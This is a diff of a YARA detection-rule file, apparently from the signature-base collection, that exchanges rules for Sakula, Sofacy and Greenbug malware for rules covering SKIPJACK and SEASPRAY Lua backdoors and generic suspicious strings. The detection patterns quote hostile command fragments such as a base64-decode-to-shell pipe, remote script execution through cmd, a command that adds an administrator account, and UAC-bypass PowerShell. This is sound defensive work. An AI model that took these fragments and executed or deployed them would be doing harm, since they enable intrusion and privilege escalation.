-		$str08 = "cmd.exe /c rundll32 \"%s\" ActiveQvaw \"%s\""
-		$opcodes01 = { 83 F9 00 74 0E 31 C0 8A 03 D0 C0 34 ?? 88 03 49 43 EB ED }
-		$opcodes02 = { 31 C0 8A 04 13 32 01 83 F8 00 75 0E 83 FA 00 74 04 49 4A }
+		$s1 = "error -1 exit" fullword
+		$s2 = "create socket error: %s(error: %d)\n" fullword
+		$s3 = "connect error: %s(error: %d)\n" fullword
+		$s4 = {C7 00 20 32 3E 26 66 C7 40 04 31 00}
+		$c1 = "plain_connect" fullword
+		$c2 = "ssl_connect" fullword
+		$c3 = "SSLShell.c" fullword
 
 	condition:
-		4 of them
+		uint32( 0 ) == 0x464c457f and filesize < 15MB and ( all of ( $s* ) or all of ( $c* ) )
 }
-rule SIGNATURE_BASE_Malware_Sakula_Shellcode
+rule SIGNATURE_BASE_APT_MAL_LUA_Hunting_SKIPJACK_1
 {
 	meta:
-		description = "Sakula shellcode - taken from decoded setup.msi but may not be unique enough to identify Sakula"
-		author = "David Cannings"
-		id = "147e4894-7877-5367-9f6b-588eb7f0379a"
-		date = "2016-06-13"
+		description = "Hunting rule looking for strings observed in SKIPJACK installation script."
+		author = "Mandiant"
+		id = "0026375c-7f37-5ef9-bd55-5b9fc499e5d2"
+		date = "2023-06-15"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sakula.yar#L47-L80"
+		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_barracuda_esg_unc4841_jun23.yar#L175-L193"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0e84d91cd1bb0455ac7d2ca78583510388f39cebd95523c5f6f173a50e0c1951"
-		score = 75
+		hash = "e4e86c273a2b67a605f5d4686783e0cc"
+		logic_hash = "8890cd9ab8190f12997e0653e43c89816df03c7bd41842e5ad21b1986819843e"
+		score = 70
 		quality = 85
 		tags = ""
 
 	strings:
-		$opcodes01 = { 55 89 E5 E8 00 00 00 00 58 83 C0 06 C9 C3 }
-		$opcodes02 = { 8B 5E 3C 8B 5C 1E 78 8B 4C 1E 20 53 8B 5C 1E 24 01 F3 }
+		$str1 = "hdr:name() == 'Content-ID'" base64
+		$str2 = "hdr:body() ~= nil" base64
+		$str3 = "string.match(hdr:body(),\"^[%w%+/=\\r\\n]+$\")" base64
+		$str4 = "openssl aes-256-cbc" base64
+		$str5 = "mod_content.lua"
+		$str6 = "#!/bin/sh"
 
 	condition:
-		any of them
+		all of them
 }
-rule SIGNATURE_BASE_LOG_Proxynotshell_POC_CVE_2022_41040_Nov22 : CVE_2022_41040 CVE_2022_41082
+rule SIGNATURE_BASE_APT_MAL_LUA_Hunting_Lua_SKIPJACK_2
 {
 	meta:
-		description = "Detects logs generated after a successful exploitation using the PoC code against CVE-2022-41040 and CVE-2022-41082 (aka ProxyNotShell) in Microsoft Exchange servers"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1e47d124-3103-5bf5-946f-b1bb69ff2c8e"
-		date = "2022-11-17"
+		description = "Hunting rule looking for strings observed in SKIPJACK samples."
+		author = "Mandiant"
+		id = "e1eac294-fe60-5bb2-bae4-0f7bcbe6b1db"
+		date = "2023-06-15"
 		modified = "2023-12-05"
-		reference = "https://github.com/testanull/ProxyNotShell-PoC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_proxynotshell_cve_2022_41040.yar#L2-L20"
+		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_barracuda_esg_unc4841_jun23.yar#L195-L212"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7f91502fd9c59180970fc4253134582b44ba318db03ef4eb575257b2f3818d94"
+		hash = "87847445f9524671022d70f2a812728f"
+		logic_hash = "093e8857c410bd30a076f87ef63d7e1e66f50e3dce75b4add67161782386ee24"
 		score = 70
 		quality = 85
-		tags = "CVE-2022-41040, CVE-2022-41082"
-
-	strings:
-		$aa1 = " POST " ascii wide
-		$aa2 = " GET " ascii wide
-		$ab1 = " 200 " ascii wide
-		$s01 = "/autodiscover.json x=a" ascii wide
-		$s02 = "/autodiscover/admin@localhost/" ascii wide
-
-	condition:
-		1 of ( $aa* ) and $ab1 and 1 of ( $s* )
-}
-
-rule SIGNATURE_BASE_Sofacy_Campaign_Mal_Feb18_Cdnver : FILE
-{
-	meta:
-		description = "Detects Sofacy malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a5c72ddd-91b0-5410-9d81-38a138ec7efe"
-		date = "2018-02-07"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/ClearskySec/status/960924755355369472"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy.yar#L4-L27"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cd3fa21710054a96cc85da13d98e0882deaa574708c833349638b57b6088131c"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "12e6642cf6413bdf5388bee663080fa299591b2ba023d069286f3be9647547c8"
+		tags = ""
 
 	strings:
-		$x1 = "cdnver.dll" fullword wide
-		$x2 = { 25 73 0A 00 00 00 00 00 30 00 00 00 20 00 2D 00
-              20 00 00 00 0A 00 00 00 25 00 73 00 00 00 00 00
-              69 00 6D 00 61 00 67 00 65 00 2F 00 6A 00 70 00
-              65 00 67 }
-		$s1 = "S7%s - %lu" fullword ascii
-		$s2 = "SNFIRNW" fullword ascii
+		$str1 = "hdr:name() == 'Content-ID'"
+		$str2 = "hdr:body() ~= nil"
+		$str3 = "string.match(hdr:body(),\"^[%w%+/=\\r\\n]+$\")"
+		$str4 = "openssl aes-256-cbc"
+		$str5 = "| base64 -d| sh 2>"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 90KB and ( pe.imphash ( ) == "01f3d0fe6fb9d9df24620e67afc143c7" or 1 of ( $x* ) or 2 of them )
+		all of them
 }
-
-rule SIGNATURE_BASE_Sofacy_Trojan_Loader_Feb18_1 : FILE
+rule SIGNATURE_BASE_APT_MAL_LUA_Hunting_Lua_SEASPRAY_1
 {
 	meta:
-		description = "Sofacy Activity Feb 2018"
-		author = "Florian Roth (Nextron Systems)"
-		id = "358d7a77-0ff5-572e-9cd8-b2cebaace02f"
-		date = "2018-03-01"
+		description = "Hunting rule looking for strings observed in SEASPRAY samples."
+		author = "Mandiant"
+		id = "8c744b85-b61e-56d0-8a9e-ae6a954e1b95"
+		date = "2023-06-15"
 		modified = "2023-12-05"
-		reference = "https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?environmentId=100"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy.yar#L29-L51"
+		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_barracuda_esg_unc4841_jun23.yar#L213-L228"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b1946af23fa0de69f5631a66fa211dab5d8731b5afdb23898428842232752e77"
-		score = 75
+		hash = "35cf6faf442d325961935f660e2ab5a0"
+		logic_hash = "856bfb47557b60f69aa1141477d6ce446ea13ebbe899022d7996ceef08bdefbb"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "335565711db93cd02d948f472c51598be4d62d60f70f25a20449c07eae36c8c5"
+		tags = ""
 
 	strings:
-		$x1 = "%appdata%\\nad.dll" fullword wide
-		$s3 = "%appdata%\\nad.bat" fullword wide
-		$s1 = "apds.dll" fullword ascii
-		$s2 = "nad.dll\"" fullword ascii
+		$str1 = "string.find(attachment:filename(),'obt075') ~= nil"
+		$str2 = "os.execute('cp '..tostring(tmpfile)..' /tmp/'..attachment:filename())"
+		$str3 = "os.execute('rverify'..' /tmp/'..attachment:filename())"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "a2d1be6502b4b3c28959a4fb0196ea45" or pe.exports ( "VidBitRpl" ) or 1 of ( $x* ) or 2 of them )
+		all of them
 }
-
-rule SIGNATURE_BASE_APT_ATP28_Sofacy_Indicators_May19_1 : FILE
+rule SIGNATURE_BASE_Ping_Command_In_EXE : FILE
 {
 	meta:
-		description = "Detects APT28 Sofacy indicators in samples"
+		description = "Detects an suspicious ping command execution in an executable"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ca768b60-7094-537a-b848-28bd42555287"
-		date = "2019-05-18"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1129647994603790338"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sofacy.yar#L53-L78"
+		id = "937ab622-fbcf-5a31-a3ff-af2584484140"
+		date = "2016-11-03"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4e3530f540cc66e99b82bd88887943c8e524d4d750734058d9a7b27f76bc6871"
+		logic_hash = "1ea24774471eade7b7c50f0eae520e2b30dbec693e162b83ab0074465f179372"
 		score = 60
 		quality = 85
 		tags = "FILE"
-		hash1 = "80548416ffb3d156d3ad332718ed322ef54b8e7b2cc77a7c5457af57f51d987a"
-		hash2 = "b40909ac0b70b7bd82465dfc7761a6b4e0df55b894dd42290e3f72cb4280fa44"
-
-	strings:
-		$x1 = "c:\\Users\\user\\Desktop\\openssl-1.0.1e_m\\/ssl/cert.pem" ascii
-		$x2 = "C:\\Users\\User\\Desktop\\Downloader_Poco" ascii
-		$s1 = "w%SystemRoot%\\System32\\npmproxy.dll" fullword wide
-		$op0 = { e8 41 37 f6 ff 48 2b e0 e8 99 ff ff ff 48 8b d0 }
-		$op1 = { e9 34 3c e3 ff cc cc cc cc 48 8d 8a 20 }
-		$op2 = { e8 af bb ef ff b8 ff ff ff ff e9 f4 01 00 00 8b }
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10000KB and ( pe.imphash ( ) == "f4e1c3aaec90d5dfa23c04da75ac9501" or 1 of ( $x* ) or ( $s1 and 2 of ( $op* ) ) )
-}
-rule SIGNATURE_BASE_Greenbug_Malware_1 : FILE
-{
-	meta:
-		description = "Detects Malware from Greenbug Incident"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3375a392-4896-572c-9688-00f01ea86ca7"
-		date = "2017-01-25"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/urp4CD"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_greenbug.yar#L12-L26"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e060a197dec0ce5da385abd282f0c4397bace8945b36198955925d02444b37a3"
-		score = 75
-		quality = 85
-		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "dab460a0b73e79299fbff2fa301420c1d97a36da7426acc0e903c70495db2b76"
 
 	strings:
-		$s1 = "vailablez" fullword ascii
-		$s2 = "Sfouglr" fullword ascii
+		$x1 = "cmd /c ping 127.0.0.1 -n " ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_Greenbug_Malware_2 : FILE
+rule SIGNATURE_BASE_Googlebot_Useragent : FILE
 {
 	meta:
-		description = "Detects Backdoor from Greenbug Incident"
+		description = "Detects the GoogleBot UserAgent String in an Executable"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e5d5ddae-cf6d-579f-9a67-9406838b5e0b"
-		date = "2017-01-25"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/urp4CD"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_greenbug.yar#L28-L54"
+		id = "621532ac-fc0b-5118-84b0-eac110693320"
+		date = "2017-01-27"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L17-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "25a9e1f08187f3d3cd0ec1384a5f4647c3368b99062f2e0d7d45c6c2ffeb66e0"
-		score = 75
+		logic_hash = "fa6cc3625d3740b91d7f1193cea0bdb621ae9445e42300123b01e322f715b976"
+		score = 65
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6b28a43eda5b6f828a65574e3f08a6d00e0acf84cbb94aac5cec5cd448a4649d"
-		hash2 = "21f5e60e9df6642dbbceca623ad59ad1778ea506b7932d75ea8db02230ce3685"
-		hash3 = "319a001d09ee9d754e8789116bbb21a3c624c999dae9cf83fde90a3fbe67ee6c"
 
 	strings:
-		$x1 = "|||Command executed successfully" fullword ascii
-		$x2 = "\\Release\\Bot Fresh.pdb" ascii
-		$x3 = "C:\\ddd\\a1.txt" fullword wide
-		$x4 = "Bots\\Bot5\\x64\\Release" ascii
-		$x5 = "Bot5\\Release\\Ism.pdb" ascii
-		$x6 = "Bot\\Release\\Ism.pdb" ascii
-		$x7 = "\\Bot Fresh\\Release\\Bot" ascii
-		$s1 = "/Home/SaveFile?commandId=CmdResult=" fullword wide
-		$s2 = "raB3G:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday" fullword ascii
-		$s3 = "Set-Cookie:\\b*{.+?}\\n" fullword wide
-		$s4 = "SELECT * FROM AntiVirusProduct" fullword wide
+		$x1 = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" fullword ascii
+		$fp1 = "McAfee, Inc." wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 2 of them ) ) or ( 3 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and $x1 and not 1 of ( $fp* ) )
 }
-rule SIGNATURE_BASE_Greenbug_Malware_3
+rule SIGNATURE_BASE_Gen_Net_Localgroup_Administrators_Add_Command : FILE
 {
 	meta:
-		description = "Detects Backdoor from Greenbug Incident"
+		description = "Detects an executable that contains a command to add a user account to the local administrators group"
 		author = "Florian Roth (Nextron Systems)"
-		id = "68142bcd-4bd0-5c80-97fc-38811565e21c"
-		date = "2017-01-25"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/urp4CD"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_greenbug.yar#L56-L73"
+		id = "9f6095fc-6d9f-5814-b407-f320191fd912"
+		date = "2017-07-08"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L34-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f4e8672da2ed9d90d4ebfccca977c4aeb93656d9e467cf479699cefd03611f32"
+		logic_hash = "af4d7c8586022583e2019bbdc3638704e1d237b25e3c214f3bc2db64c58c8bd3"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49"
-		hash2 = "7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c"
 
 	strings:
-		$x1 = "F:\\Projects\\Bot\\Bot\\Release\\Ism.pdb" fullword ascii
-		$x2 = "C:\\ddd\\wer2.txt" fullword wide
-		$x3 = "\\Microsoft\\Windows\\tmp43hh11.txt" wide
+		$x1 = /net localgroup administrators [a-zA-Z0-9]{1,16} \/add/ nocase ascii
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them )
 }
-rule SIGNATURE_BASE_Greenbug_Malware_4 : FILE
+rule SIGNATURE_BASE_Suspicious_Script_Running_From_HTTP
 {
 	meta:
-		description = "Detects ISMDoor Backdoor"
+		description = "Detects a suspicious "
 		author = "Florian Roth (Nextron Systems)"
-		id = "d45dea36-6051-5531-afd2-abf27cd06a12"
-		date = "2017-01-25"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/urp4CD"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_greenbug.yar#L75-L101"
+		id = "9ba84e9c-a32b-5f66-8d50-75344599cafc"
+		date = "2017-08-20"
+		modified = "2025-03-21"
+		reference = "https://www.hybrid-analysis.com/sample/a112274e109c5819d54aa8de89b0e707b243f4929a83e77439e3ff01ed218a35?environmentId=100"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L48-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "869832536d838e062227ccd3b84f8559d2215360c0e09ec791db623d7d3d7a3b"
-		score = 75
+		logic_hash = "49ead238b9153886ddbcfe37939628fd848283373e2807797d0849559ebecf6c"
+		score = 50
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f"
-		hash2 = "82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9"
 
 	strings:
-		$s1 = "powershell.exe -nologo -windowstyle hidden -c \"Set-ExecutionPolicy -scope currentuser" fullword ascii
-		$s2 = "powershell.exe -c \"Set-ExecutionPolicy -scope currentuser -ExecutionPolicy unrestricted -f; . \"" fullword ascii
-		$s3 = "c:\\windows\\temp\\tmp8873" fullword ascii
-		$s4 = "taskkill /im winit.exe /f" fullword ascii
-		$s5 = "invoke-psuacme"
-		$s6 = "-method oobe -payload \"\"" fullword ascii
-		$s7 = "C:\\ProgramData\\stat2.dat" fullword wide
-		$s8 = "Invoke-bypassuac" fullword ascii
-		$s9 = "Start Keylog Done" fullword wide
-		$s10 = "Microsoft\\Windows\\WinIt.exe" fullword ascii
-		$s11 = "Microsoft\\Windows\\Tmp9932u1.bat\"" fullword ascii
-		$s12 = "Microsoft\\Windows\\tmp43hh11.txt" fullword wide
+		$s1 = "cmd /C script:http://" ascii nocase
+		$s2 = "cmd /C script:https://" ascii nocase
+		$s3 = "cmd.exe /C script:http://" ascii nocase
+		$s4 = "cmd.exe /C script:https://" ascii nocase
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them ) or ( 3 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Greenbug_Malware_5 : FILE
+rule SIGNATURE_BASE_Reconcommands_In_File : FILE
 {
 	meta:
-		description = "Auto-generated rule"
+		description = "Detects various recon commands in a single file"
 		author = "Florian Roth (Nextron Systems)"
-		id = "12362711-f466-5f9e-9227-1cf84aec93e5"
-		date = "2017-01-25"
-		modified = "2023-01-27"
-		reference = "https://goo.gl/urp4CD"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_greenbug.yar#L103-L128"
+		id = "62d59913-5dbd-512c-98ea-044bbb9ac2da"
+		date = "2017-12-11"
+		modified = "2025-03-21"
+		reference = "https://twitter.com/haroonmeer/status/939099379834658817"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L66-L86"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cdb4b2447e7eb3546b33a804abf5fbc20817823e5c9440109db7b44adf90899d"
-		score = 75
+		logic_hash = "73b4bcf76f42a6bf9c3d9dfe3f4e754ce2856e03a47cfd35388d47290209e65d"
+		score = 40
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f"
-		hash2 = "44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49"
-		hash3 = "7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c"
-		hash4 = "82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9"
 
 	strings:
-		$x1 = "cmd /u /c WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter" fullword ascii
-		$x2 = "cmd /a /c net user administrator /domain >>" fullword ascii
-		$x3 = "cmd /a /c netstat -ant >>\"%localappdata%\\Microsoft\\" ascii
-		$o1 = "========================== (Net User) ==========================" ascii fullword
+		$ = "tasklist"
+		$ = "net time"
+		$ = "systeminfo"
+		$ = "whoami"
+		$ = "nbtstat"
+		$ = "net start"
+		$ = "qprocess"
+		$ = "nslookup"
 
 	condition:
-		filesize < 2000KB and ( ( uint16( 0 ) == 0x5a4d and 1 of them ) or $o1 )
+		filesize < 5KB and 4 of them
 }
-
-rule SIGNATURE_BASE_Greenbug_Malware_Nov17_1 : FILE
+rule SIGNATURE_BASE_VBS_Dropper_Script_Dec17_1 : FILE
 {
 	meta:
-		description = "Detects Greenbug Malware"
+		description = "Detects a supicious VBS script that drops an executable"
 		author = "Florian Roth (Nextron Systems)"
-		id = "50816c09-5f38-5e05-9915-b96f00ee4b88"
-		date = "2017-11-26"
-		modified = "2023-12-05"
-		reference = "http://www.clearskysec.com/greenbug/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_greenbug.yar#L141-L169"
+		id = "60f23d32-0737-501f-bf1c-1ca32af62efc"
+		date = "2018-01-01"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L88-L107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "afd006d7e53cdedbed5938e5dea71273dd21a1382239bac03194662e95d053c8"
-		score = 75
-		quality = 83
+		logic_hash = "f3c55bd6bf382891263887e46a794329c78bff87b7685088911261fc3b3b133d"
+		score = 80
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6e55e161dc9ace3076640a36ef4a8819bb85c6d5e88d8e852088478f79cf3b7c"
-		hash2 = "a9f1375da973b229eb649dc3c07484ae7513032b79665efe78c0e55a6e716821"
 
 	strings:
-		$x1 = "AgentV2.exe  -c  SampleDomain.com" fullword ascii
-		$x2 = ".ntpupdateserver.com" fullword ascii
-		$x3 = "Content-Disposition: form-data; name=\"file\"; filename=\"a.a\"" fullword ascii
-		$x4 = "a67d0db885a3432576548a2a03707334" fullword ascii
-		$x5 = "a67d0db8a2a173347654432503702aa3" fullword ascii
-		$x6 = "!!! can not create output file !!!" fullword ascii
-		$s1 = "\\runlog*" ascii
-		$s2 = "can not specify username!!" fullword ascii
-		$s3 = "Agent can not be configured" fullword ascii
+		$s1 = "TVpTAQEAAAAEAA"
+		$s2 = "TVoAAAAAAAAAAA"
+		$s3 = "TVqAAAEAAAAEAB"
+		$s4 = "TVpQAAIAAAAEAA"
+		$s5 = "TVqQAAMAAAAEAA"
+		$a1 = "= CreateObject(\"Wscript.Shell\")" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( pe.imphash ( ) == "58ba44f7ff5436a603fec3df97d815ea" or pe.imphash ( ) == "538805ecd776b9a42e71aebf94fde1b1" or 1 of ( $x* ) or 3 of them )
+		filesize < 600KB and $a1 and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_Apolmy_Privesc_Trojan : FILE
+rule SIGNATURE_BASE_SUSP_PDB_Strings_Keylogger_Backdoor : HIGHVOL FILE
 {
 	meta:
-		description = "Apolmy Privilege Escalation Trojan used in APT Terracotta"
+		description = "Detects PDB strings used in backdoors or keyloggers"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2f3f496b-ebfe-5a6e-89ad-a24af6378fd7"
-		date = "2015-08-04"
-		modified = "2023-12-05"
-		reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_terracotta.yar#L11-L27"
+		id = "190daadb-0de6-5665-a241-95c374dbda47"
+		date = "2018-03-23"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L109-L130"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d7bd289e6cee228eb46a1be1fcdc3a2bd5251bc1eafb59f8111756777d8f373d"
-		logic_hash = "8cce828806d5829735d6ac8d28a48c9b016b96b4370b2f3ac139799a9fe13c4a"
-		score = 80
+		logic_hash = "9a842ff8cd8be98a2e37a81706a9c594e8bf1bcc6bd3cedfe4747cd52f6044f5"
+		score = 65
 		quality = 85
-		tags = "FILE"
+		tags = "HIGHVOL, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "[%d] Failed, %08X" fullword ascii
-		$s2 = "[%d] Offset can not fetched." fullword ascii
-		$s3 = "PowerShadow2011" fullword wide
+		$ = "\\Release\\PrivilegeEscalation"
+		$ = "\\Release\\KeyLogger"
+		$ = "\\Debug\\PrivilegeEscalation"
+		$ = "\\Debug\\KeyLogger"
+		$ = "Backdoor\\KeyLogger_"
+		$ = "\\ShellCode\\Debug\\"
+		$ = "\\ShellCode\\Release\\"
+		$ = "\\New Backdoor"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them
 }
-rule SIGNATURE_BASE_Mithozhan_Trojan : FILE
+rule SIGNATURE_BASE_SUSP_Microsoft_Copyright_String_Anomaly_2 : FILE
 {
 	meta:
-		description = "Mitozhan Trojan used in APT Terracotta"
+		description = "Detects Floxif Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5e2b4e08-1a35-5eb0-8c25-a73d45b0e279"
-		date = "2015-08-04"
-		modified = "2023-12-05"
-		reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_terracotta.yar#L29-L45"
+		id = "3257aff0-b923-5e56-b67c-fa676341a102"
+		date = "2018-05-11"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L132-L146"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8553b945e2d4b9f45c438797d6b5e73cfe2899af1f9fd87593af4fd7fb51794a"
-		logic_hash = "a7beb030368cc6e1119617991b68e6fa1bf2d1f6eee28e83fef7862313f19d30"
-		score = 70
+		logic_hash = "60bc5d8d0853f474b81d2274a65977a12a481e4b669b38ae47a325eeb60d2735"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085"
 
 	strings:
-		$s1 = "adbrowser" fullword wide
-		$s2 = "IJKLlGdmaWhram0vn36BgIOChYR3L45xcHNydXQvhmloa2ptbH8voYCDTw==" fullword ascii
-		$s3 = "EFGHlGdmaWhrL41sf36BgIOCL6R3dk8=" fullword ascii
